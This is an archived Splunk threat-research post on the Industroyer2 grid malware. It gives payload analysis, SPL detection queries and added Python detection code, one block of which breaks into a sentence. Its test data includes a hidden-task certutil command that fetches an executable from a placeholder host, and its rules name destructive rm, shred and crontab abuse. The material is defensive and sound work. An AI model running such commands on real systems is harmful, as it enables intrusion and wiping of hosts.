{
	"id": "f737c115-47c3-4232-87a1-bb8b28f9c435",
	"created_at": "2026-04-06T00:19:10.470739Z",
	"updated_at": "2026-04-10T03:24:17.931694Z",
	"deleted_at": null,
	"sha1_hash": "d6a194bcb216e6c55cbb14942953db47a1b59e15",
	"title": "Threat Update: Industroyer2 | Splunk",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4961430,
	"plain_text": "Threat Update: Industroyer2 | Splunk\r\nBy Splunk Threat Research Team\r\nPublished: 2022-06-23 · Archived: 2026-04-05 19:07:36 UTC\r\nSplunk is committed to using inclusive and unbiased language. This blog post might contain terminology that we\r\nno longer use. For more information on our updated terminology and our stance on biased language, please visit\r\nour blog post. We appreciate your understanding as we work towards making our community more inclusive for\r\neveryone.\r\nThe Splunk Threat Research Team (STRT) continues to monitor new relevant payloads to the ongoing conflict in\r\nEastern Europe. One of these new payloads was found by the Ukranian CERT named “Industroyer2.” The name of\r\nthis new payload references the original \"Industroyer\" malicious payload used against the country of Ukraine's\r\npower grid in 2016 and allegedly was able to affect a fifth of the power capacity of the city of Kyiv.\r\nAccording to the recent Ukraine CERT and ESET report, Industroyer2 resembles the former Industroyer in\r\nfunctionality and is also targeting the electric grid containing commands targeting high-voltage electrical\r\nsubstations. It was reported that Industroyer2 was also used along with CaddyWiper, another payload recently\r\naddressed by the Splunk Threat Research Team. This payload — in combination with previous featured\r\ndestructive payloads — targets CPEs. 
These customer premises devices, such as modems, cable modems, and internet gateways, provide connectivity to the great majority of commercial and residential customers, and targeting them speaks to the attacker's intention of overwhelming or degrading the victim's infrastructure.\r\nThe following is an analysis of relevant detection opportunities for this payload and of the TTPs observed during its deployment.\r\nParameter Check\r\nThe first part of its code checks for command-line parameters that enable features related to timing and logging. Below is the code screenshot of this check with its two parameters.\r\nhttps://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html\r\nPage 1 of 14\n\nThe first parameter is \"-t\", which starts a waiting timer relative to the current minute of the system time. For example, if the system time is 14:19:22 and the parameter is given the value 25 as the third command-line argument, the payload waits until the clock reaches minute 25 (roughly five and a half minutes in this case) before it executes its code, as in the screenshot below.\r\nThe \"-o\" parameter redirects its console logs to a debug log file whose path is given as the third command-line argument.\r\nConsole Logs\r\nUpon execution, the malware prints console logs in a custom format that indicates which features it is executing. Some of these are discussed further under the next subheadings. Below is an example of the console logs during its execution.\r\nTerminate Process and Rename Process File Path\r\nThis function enumerates all running processes on the targeted host and looks for the process named \"PServiceControl.exe\" and for the process name stated in its config data. 
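The parameter check above and the hardcoded configuration data (IEC-104 target IP, port 2404, the PService_PPD.exe process name and the D:\\OIK\\DevCounter path) described under Hardcoded Configuration Data can be modelled to reason about the payload's timing and its CommandLineToArgvW()-based config parsing. The following Python is an added example written for this post, not code from the original post or from the malware: it re-implements the CommandLineToArgvW() quoting rules for the argument list, parses a constructed config line carrying only the four components the post names (the IP 192.0.2.10 is a documentation-range placeholder, not an indicator), recognises the -t and -o switches, and computes how long -t makes the payload wait. The roll-over into the next hour when the requested minute has already passed is an assumption; the post does not describe that case.

```python
QUOTE = chr(34)   # the double-quote character
BS = chr(92)      # the backslash character


def split_windows_argv(cmdline):
    '''Split an argument string the way CommandLineToArgvW() does after the
    program name: whitespace separates arguments, double quotes group text,
    2n backslashes before a quote yield n backslashes and the quote toggles
    quoting, 2n+1 backslashes yield n backslashes plus a literal quote.
    (The doubled-quote-inside-quotes rule is omitted for brevity.)'''
    args, cur, in_quotes, have_arg = [], [], False, False
    i, n = 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == BS:
            j = i
            while j < n and cmdline[j] == BS:
                j += 1
            count = j - i
            if j < n and cmdline[j] == QUOTE:
                cur.append(BS * (count // 2))
                if count % 2:
                    cur.append(QUOTE)          # odd run: escaped literal quote
                else:
                    in_quotes = not in_quotes  # even run: the quote is a delimiter
                j += 1
            else:
                cur.append(BS * count)         # backslashes not before a quote are literal
            i, have_arg = j, True
            continue
        if c == QUOTE:
            in_quotes = not in_quotes
            have_arg = True
        elif c in ' \t' and not in_quotes:
            if have_arg:
                args.append(''.join(cur))
                cur, have_arg = [], False
        else:
            cur.append(c)
            have_arg = True
        i += 1
    if have_arg:
        args.append(''.join(cur))
    return args


# Constructed config line in the order the post lists the components
# (IP, port, process name, path). Placeholder IP, not an indicator.
SAMPLE_CONFIG = ' '.join([
    '192.0.2.10',
    '2404',
    'PService_PPD.exe',
    QUOTE + 'D:' + BS + 'OIK' + BS + 'DevCounter' + QUOTE,
])


def parse_config(config_line):
    '''Split the hardcoded config the way the payload does (argv rules) and
    place the four components the post names into a structure.'''
    fields = split_windows_argv(config_line)
    if len(fields) < 4:
        raise ValueError('expected at least 4 config fields, got %d' % len(fields))
    port = int(fields[1])
    if not 0 < port < 65536:
        raise ValueError('bad port %d' % port)
    return {'ip': fields[0], 'port': port,
            'kill_process': fields[2], 'kill_path': fields[3]}


def parse_switches(argv):
    '''Recognise the two optional switches: -t <minute> and -o <logfile>.
    argv excludes the program name, so the value is the third parameter
    the post refers to.'''
    opts = {'start_minute': None, 'log_file': None}
    i = 0
    while i + 1 < len(argv):
        if argv[i] == '-t':
            opts['start_minute'] = int(argv[i + 1])
        elif argv[i] == '-o':
            opts['log_file'] = argv[i + 1]
        i += 2
    return opts


def seconds_until_minute(now_hms, target_minute):
    '''Seconds the -t timer sleeps: until the wall clock (HH:MM:SS) next
    shows target_minute. Assumption: if that minute has already passed in
    the current hour, the wait rolls over into the next hour.'''
    if not 0 <= target_minute <= 59:
        raise ValueError('minute must be 0-59')
    h, m, s = (int(x) for x in now_hms.split(':'))
    now_s = h * 3600 + m * 60 + s
    target_s = h * 3600 + target_minute * 60
    if target_s < now_s:
        target_s += 3600
    return target_s - now_s


if __name__ == '__main__':
    opts = parse_switches(['-t', '25'])
    print(parse_config(SAMPLE_CONFIG))
    print('wait', seconds_until_minute('14:19:22', opts['start_minute']), 'seconds')
```

Run as a script it prints the parsed structure and a wait of 338 seconds for the post's 14:19:22 / 25 example, the five and a half minutes the post rounds down to five. The argv splitter is the part worth keeping: any config string recovered from a sample can be fed to it to obtain the same field boundaries the binary sees, quoted paths included.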
It also looks for the executable of that process in a specific folder named in the config data and renames it with a \".MZ\" file extension.\r\nThe code screenshot below shows the process termination and the renaming of the process file path. In the code snippet, the string \"RNM\" followed by the last error code after the MoveFileA() call is what gets written to the console log once this part of the code runs; the same string is visible in the console log screenshot earlier.\r\nHardcoded Configuration Data\r\nThis malware contains hardcoded configuration data that is parsed with the help of the CommandLineToArgvW() function and stored in a structure used later in its code. Below is the screenshot of the parsing function.\r\nThe config data contains values and checks that this payload uses throughout its execution. We saw four main components in the three configuration data settings hardcoded in its data section, as in the screenshot below:\r\nThe first component is the IP address of the device it tries to communicate with over the IEC-104 protocol; the second is the port number (2404, the standard IEC-104 TCP port); the third is the process name (PService_PPD.exe) it tries to kill in addition to \"PServiceControl.exe\"; and the fourth is a file path (D:\\OIK\\DevCounter) where it locates the executable of the process it kills in order to rename it with the .MZ file extension.\r\nDetections\r\nBelow are the detections related to the Industroyer2 malware and to other components found during the attack, as described in the ESET blog and the CERT-UA advisory.\r\nLinux Adding Crontab Using List Parameter\r\nThis analytic identifies a suspicious cron job modification using the crontab list parameter. 
The list parameter (-l) is typically used in one-liners that dump the existing crontab, append a line, and reload it, so malware like Industroyer2, adversaries, and red teamers can abuse it to add a crontab entry that runs their malicious code on the schedule they want.\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process_name = \"crontab\" Processes.process= \"* -l*\"\r\n by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.par\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nLinux Deleting Critical Directory Using RM Command\r\nThis analytic identifies a suspicious deletion of a critical directory on a Linux machine using the rm command. This technique was seen in the Industroyer2 campaign to wipe or destroy Linux hosts in the targeted energy facilities.\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process_name =rm AND Processes.process= \"* -rf *\" AND Processes.process IN (\"*/boot/*\", \"*/va\r\n by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.pare\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`\r\nLinux Disable Services\r\nThis analytic identifies events that attempt to disable a service. 
This is typically seen alongside service enumeration and attempts to stop a service and then delete it.\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process_name IN (\"systemctl\", \"service\", \"svcadm\") Processes.process = \"* disable*\"\r\n by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.pare\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`\r\nLinux Shred Overwrite Command\r\nThis analytic identifies a shred process overwriting files on a Linux machine. The shred utility is designed to overwrite a file so that its contents are hidden and the deleted file is unrecoverable; the -n, -u, -z and -s options matched below select the number of passes, removal after overwriting, a final zero-fill pass, and the number of bytes to shred.\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process_name =shred AND Processes.process IN (\"*-n*\", \"*-u*\", \"*-z*\", \"*-s*\")\r\n by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.pare\r\n | `drop_dm_object_name(Processes)`\r\n | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`\r\nLinux Stop Services\r\nThis analytic identifies events that attempt to stop or clear a service. This is typically seen alongside service enumeration and attempts to stop a service and then delete it.\r\n| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=E\r\n where Processes.process_name IN (\"systemctl\", \"service\", \"svcadm\") Processes.process =\"*stop*\"\r\n by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.pare\r\n Processes.process_guid Processes.dest 
Processes.user\r\n | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\nLinux High Frequency Of File Deletion In Boot Folder\r\nThis analytic identifies a high frequency of file deletions in the /boot/ folder, counted per process name and process ID within a one-hour window and joined to the process record, while excluding a list of known benign parent processes such as package managers.\r\n| tstats `security_content_summariesonly` values(Filesystem.file_name) as deletedFileNames values(Filesystem.fi\r\n FROM datamodel=Endpoint.Filesystem\r\n where Filesystem.action=deleted Filesystem.file_path = \"/boot/*\"\r\n by _time span=1h Filesystem.dest Filesystem.process_guid Filesystem.action\r\n | `drop_dm_object_name(Filesystem)`\r\n |rename process_guid as proc_guid\r\n |join proc_guid, _time [\r\n | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.parent_proc\r\nNOT (Processes.parent_process_name IN (\"/usr/bin/dpkg\", \"*usr/bin/python*\", \"*/usr/bin/apt-*\", \"/bin/rm\", \"*s\r\n by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest Processes.paren\r\n | `drop_dm_object_name(Processes)`\r\n |rename process_guid as proc_guid\r\n | fields _time dest user parent_process_name parent_process process_name process_path process proc_guid regis\r\n | table process_name process proc_guid action _time deletedFileNames deletedFilePath numOfDelFilePath paren\r\n | where numOfDelFilePath >= 200\r\nWindows Processes Killed By Industroyer2 Malware\r\nThis analytic identifies known processes killed by Industroyer2 malware. The technique was seen in the Industroyer2 attack, which tries to kill several processes on Windows hosts related to the energy facility's network; the analytic relies on Sysmon EventCode 5 (process terminated) for the two process names hardcoded in the payload.\r\n`sysmon` EventCode=5 process_name IN (\"PServiceControl.exe\", \"PService_PPD.exe\")\r\n | stats 
min(_time) as firstTime max(_time) as lastTime count by process_name process process_path process_gui\r\n | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`\r\nWindows Hidden Schedule Task Settings\r\nThe following query uses Windows Security EventCode 4698 (a scheduled task was created) to identify suspicious tasks registered on Windows either via schtasks.exe or via the TaskService COM object with the hidden setting enabled, a trait of malware like Industroyer2 and of attacks that use a LOLBin to download other files or payloads to the infected machine. The query relies on the task XML that 4698 carries in the Message field, which xmlkv turns into fields such as Hidden and Command.\r\n`wineventlog_security` EventCode=4698\r\n | xmlkv Message\r\n | search Hidden = true\r\n | stats count min(_time) as firstTime max(_time) as lastTime by Task_Name, Command, Author, Hidden, dest\r\n | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`\r\nWindows Linked Policies In ADSI Discovery\r\nThis analytic uses PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory organizational units for their linked group policies.\r\n`powershell` EventCode=4104 ScriptBlockText = \"*[adsisearcher]*\" ScriptBlockText = \"*objectcategory=organizatio\r\n | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id\r\n | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`\r\nWindows Root Domain Linked Policies Discovery\r\nThis analytic uses PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query the root of the domain for its linked group policies. 
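Two of the detections above, Linux High Frequency Of File Deletion In Boot Folder and Windows Hidden Schedule Task Settings, lend themselves to a worked run outside Splunk. The following Python is an added example written for this post, not Splunk's own detection code: it applies the same logic to constructed sample telemetry, bucketing deleted /boot paths per process GUID into one-hour windows with the visible part of the parent-process allow-list and the 200-path threshold, and parsing the task XML carried in a 4698 Message (the content xmlkv exposes as fields) to flag tasks whose Hidden setting is true. Event field names, GUIDs, hostnames and the certutil download command in the sample task are constructed.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Parent processes the post's SPL excludes from the /boot deletion analytic.
# The published list is truncated on the page; this is the visible subset.
BOOT_PARENT_ALLOWLIST = ('/usr/bin/dpkg', 'usr/bin/python', '/usr/bin/apt-', '/bin/rm')
BOOT_DELETE_THRESHOLD = 200
TASK_NS = 'http://schemas.microsoft.com/windows/2004/02/mit/task'


def boot_deletion_bursts(fs_events, proc_events, threshold=BOOT_DELETE_THRESHOLD):
    '''Count distinct /boot paths deleted per (1h bucket, dest, process_guid),
    join the process record on process_guid, drop allow-listed parents and
    keep the buckets at or above the threshold (numOfDelFilePath >= 200).'''
    buckets = defaultdict(set)
    for ev in fs_events:
        if ev['action'] != 'deleted' or not ev['file_path'].startswith('/boot/'):
            continue
        hour = ev['time'] - ev['time'] % 3600            # span=1h
        buckets[(hour, ev['dest'], ev['process_guid'])].add(ev['file_path'])
    hits = []
    for (hour, dest, guid), paths in sorted(buckets.items()):
        proc = proc_events.get(guid)
        if proc is None:
            continue                                      # inner join: no process, no alert
        parent = proc['parent_process_name']
        if any(p in parent for p in BOOT_PARENT_ALLOWLIST):
            continue
        if len(paths) >= threshold:
            hits.append({'time': hour, 'dest': dest, 'process_guid': guid,
                         'process_name': proc['process_name'], 'parent': parent,
                         'num_deleted': len(paths)})
    return hits


def hidden_scheduled_tasks(events):
    '''For each 4698 event parse the task XML embedded in Message and report
    tasks whose Settings/Hidden is true together with the command they run.'''
    hits = []
    for ev in events:
        if ev.get('EventCode') != 4698:
            continue
        msg = ev['Message']
        start = msg.find('<Task')
        if start < 0:
            continue                                      # no task XML to inspect
        task = ET.fromstring(msg[start:])
        hidden = task.find('./{*}Settings/{*}Hidden')     # namespace-agnostic lookup
        if hidden is None or (hidden.text or '').strip().lower() != 'true':
            continue
        cmd = task.find('./{*}Actions/{*}Exec/{*}Command')
        args = task.find('./{*}Actions/{*}Exec/{*}Arguments')
        hits.append({'task_name': ev['Task_Name'], 'author': ev.get('Author', ''),
                     'command': cmd.text if cmd is not None else '',
                     'arguments': args.text if args is not None else '',
                     'dest': ev['dest']})
    return hits


def constructed_linux_events():
    '''Constructed telemetry: rm spawned from a shell deleting 250 /boot files,
    dpkg deleting 250 during an upgrade (allow-listed), and a 5-file burst.'''
    base = 1_650_000_000
    procs = {'guid-rm': {'process_name': 'rm', 'parent_process_name': '/bin/bash'},
             'guid-dpkg': {'process_name': 'rm', 'parent_process_name': '/usr/bin/dpkg'},
             'guid-few': {'process_name': 'rm', 'parent_process_name': '/bin/bash'}}
    fs = []
    for i in range(250):
        for guid in ('guid-rm', 'guid-dpkg'):
            fs.append({'time': base + i, 'dest': 'host1', 'process_guid': guid,
                       'action': 'deleted', 'file_path': '/boot/%s-%d' % (guid, i)})
    for i in range(5):
        fs.append({'time': base + i, 'dest': 'host1', 'process_guid': 'guid-few',
                   'action': 'deleted', 'file_path': '/boot/tmp-%d' % i})
    return fs, procs


TASK_TEMPLATE = ('''A scheduled task was created. Task Content: '''
                 '''<Task version='1.2' xmlns='%s'><Settings><Hidden>%s</Hidden></Settings>'''
                 '''<Actions><Exec><Command>%s</Command><Arguments>%s</Arguments></Exec></Actions></Task>''')


def constructed_4698_events():
    '''Constructed Security 4698 records: one hidden task that runs a LOLBin
    download through cmd.exe and one ordinary visible task.'''
    return [
        {'EventCode': 4698, 'dest': 'ws01', 'Task_Name': chr(92) + 'Updater',
         'Author': 'CORP' + chr(92) + 'svc',
         'Message': TASK_TEMPLATE % (TASK_NS, 'true', 'cmd.exe',
                                     '/c certutil.exe -urlcache -f http://example.test/p.exe p.exe')},
        {'EventCode': 4698, 'dest': 'ws02', 'Task_Name': chr(92) + 'Backup',
         'Author': 'CORP' + chr(92) + 'admin',
         'Message': TASK_TEMPLATE % (TASK_NS, 'false', 'backup.exe', '')},
    ]


if __name__ == '__main__':
    print(boot_deletion_bursts(*constructed_linux_events()))
    print(hidden_scheduled_tasks(constructed_4698_events()))
```

On the sample data only the shell-spawned rm burst and the hidden Updater task are reported; the dpkg run is dropped by the allow-list even though it deletes as many files, which is the trade-off the SPL makes. The threshold argument lets the 200 figure be tuned against a site's own upgrade baseline before the analytic is enabled.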
Red teams and adversaries may leverage `[Adsisearcher]` to enumerate root domain linked policies for situational awareness and Active Directory discovery.\r\n`powershell` EventCode=4104 ScriptBlockText = \"*[adsisearcher]*\" ScriptBlockText = \"*.SearchRooT*\" ScriptBlockT\r\n | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id\r\n | `security_content_ctime(firstTime)`\r\n | `security_content_ctime(lastTime)`\r\n* To see a detailed explanation of the different detection types, please refer to this wiki.\r\nIOC:\r\nMitigation\r\nPlease follow the CISA and NSA joint advisory on securing Operational Technology (OT).\r\nLearn More\r\nYou can find the latest content about security analytic stories on GitHub and in Splunkbase. Splunk Security Essentials also has these detections available via push update. In the upcoming weeks, the Splunk Threat Research Team will be releasing a more detailed blog post on this analytic story. Stay tuned!\r\nFor a full list of security content, check out the release notes on Splunk Docs.\r\nFeedback\r\nAny feedback or requests? Feel free to put in an issue on GitHub and we'll follow up. Alternatively, join us on the Slack channel #security-research. Follow these instructions if you need an invitation to our Splunk user groups on Slack.\r\nWe would like to thank the following for their contributions to this post: Teoderick Contreras, Rod Soto, Jose Hernandez, Patrick Bareiss, Lou Stella, Mauricio Velazco, Michael Haag, Bhavin Patel, and Eric McGinnis\r\nSource: https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html"
	],
	"report_names": [
		"threat-update-industroyer2.html"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434750,
	"ts_updated_at": 1775791457,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d6a194bcb216e6c55cbb14942953db47a1b59e15.pdf",
		"text": "https://archive.orkl.eu/d6a194bcb216e6c55cbb14942953db47a1b59e15.txt",
		"img": "https://archive.orkl.eu/d6a194bcb216e6c55cbb14942953db47a1b59e15.jpg"
	}
}